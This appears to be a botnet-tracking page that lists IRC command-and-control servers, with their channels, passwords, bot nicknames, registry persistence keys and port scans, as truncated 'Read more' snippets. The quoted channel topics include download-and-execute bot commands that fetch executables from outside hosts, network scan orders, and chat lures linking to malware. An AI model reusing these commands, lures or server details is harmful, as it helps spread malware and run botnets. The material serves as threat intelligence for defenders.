golpe.dyndns.org * C&C Server: * Server Password: * Username: XP-3233 * Nickname: [DEU|00|P|61069] * Channel: #uNk (Password: test) * Channeltopic: :*.msn.msg hola!!! vas a mirar o no la foto? dale!!!! http://liz2009.fileave.com/foto.exe 😛 🙂 * IRC Data o User Name: XP-9745 o Host Name: * o Server Name: o Real Name: DWI-9625AC2E275 o Password:Read more...
DUBAI.irc.gov (4545) Invisible Users: 23Operators: 8 operator(s) onlineChannels: 3 channels formedClients: I have 22 clients and 1 serversLocal users: Current Local Users: 22 Max: 45Global users: Current Global Users: 30 Max: 53 Now talking in #2Topic On: [ #2 ] [ .find vnc-5900 100 5 0 189.x.x.x ]Topic By: [ systemerror ]Modes On: [#2 ]Read more...
kgameserv1.ns02.info (rage bot) [LiQ-Krew]22070Username: eaxaahbJoined Channel: #mscan with Password scanChannel Topic for Channel #mscan: “!scan 94 random 69.x.x.x 3 1”Private Message to Channel #mscan: “[RAGE SCAN:] range: 69.x.x.x/94 threads.”Private Message to User [LiQ-Krew]22070: “VERSION” * IRC Data o User Name: suvhrsg o Host Name: “fo8.net” o Server Name: o Real Name: suvhrsg o Nick Name: [nLh-VNC]uhenwu oRead more... ircd heavly secured) Interesting ports on shown: 1692 filtered portsPORT STATE SERVICE VERSION21/tcp open ftp?25/tcp open smtp?80/tcp open http?110/tcp open pop3?443/tcp open https?
Remote Host Port Number66.252.5.52 22322 NICK ModkxitqgdzxjUSER rnipumlhxm “” “sfm” :rnipumlhxmJOIN #darkwar w4rPONG :d30-58-66.gci.net Registry Modifications * The following Registry Key was created: o HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components{67EFG7H6-8IJL-56YT-KLH4-76WE2D3RAM87} * The newly created Registry Value is: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components{67EFG7H6-8IJL-56YT-KLH4-76WE2D3RAM87}] + StubPath = “c:CONFIGS-1-5-21-1482476501-1644491937-682003330-1013ConfDriver.exe” so that ConfDriver.exe runs every time Windows starts * The following directories wereRead more...
5854.jivagaming.com(PrinC Nes Mod)
5854.jivagaming.com * C&C Server: * Server Password: * Username: thegibson * Nickname: [0008][DEU|XP|LAN|76672] * Channel: #rice (Password: ) * Channeltopic: :.stopm2 |.m2 es esta imagen tuya http://noordfoto.com/facebook.php?= |.y es esta imagen tuya http://noordfoto.com/facebook.php?= |.rar |.zip Create or Open Changes HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun “lsass” = lsass.exeReads HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTFSystemShared “CUAS”HKEY_CURRENT_USERKeyboard LayoutToggle “Language Hotkey”HKEY_CURRENT_USERKeyboard LayoutToggle “Layout Hotkey”HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTF “EnableAnchorContext”HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionIMMRead more...
project-h4x0r.com(PrinC Nes Mod)
project-h4x0r.com * C&C Server: * Server Password: * Username: XP-8755 * Nickname: [DEU|00|P|60691] * Channel: #yakuza (Password: ) * Channeltopic: :~dl.start http://noordfoto.com/facebook.exe C:crz.exe 1 |~dl http://noordfoto.com/facebook.exe C:crz.exe 1 Nes Bot Mod)
Remote Host Port Number85.234.148.240 17402 MODE [0008][USA|XP|LAN|73208] +ixJOIN #riceJOIN #inforicePONG 22 MOTDPRIVMSG #rice :[bot]sn] Thread Disabled.PRIVMSG #rice :I’ve sent myself to 0 contacts via MSN.PONG leaf.rice.netNICK [0008][USA|XP|LAN|73208]USER thegibson * 0 :[0008][USA|XP|LAN|73208] PASS jewboy Registry Modifications * The newly created Registry Value is: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] + lsass = “lsass.exe” so that lsass.exe runs every time WindowsRead more...
204-232-192-26.static.cloud-ips.com ( ogard’s big net again 23k
Remote Host Port Number204.232.192.26 5900 NICK VirUs-hhefhkdzUSER VirUs “” “ydf” :8Coded8Ahmed.Ramzey@Hotmail.Com..PASS Virus Registry Modifications * The following Registry Key was created: o HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components{67KLN5J0-4OPM-00WE-AAX5-77EF1D187562} * The newly created Registry Value is: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components{67KLN5J0-4OPM-00WE-AAX5-77EF1D187562}] + StubPath = “c:RESTOREk-1-3542-4232123213-7676767-8888886JUZZ.exe” so that JUZZ.exe runs every time Windows starts Interesting ports on 204-232-192-26.static.cloud-ips.com ( shown: 1688Read more...
server27.01domain.net (
Remote Host Port Number74.86.116.171 85 JOIN #0x9# 12xmas25NICK _00-USA-XP-21180USER http lol lol ovened PASS ms09xx Registry Modifications * The following Registry Key was created: o HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun * The newly created Registry Value is: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] + svchost.exe = “%AppData%svchost.exe” so that svchost.exe runs every time Windows starts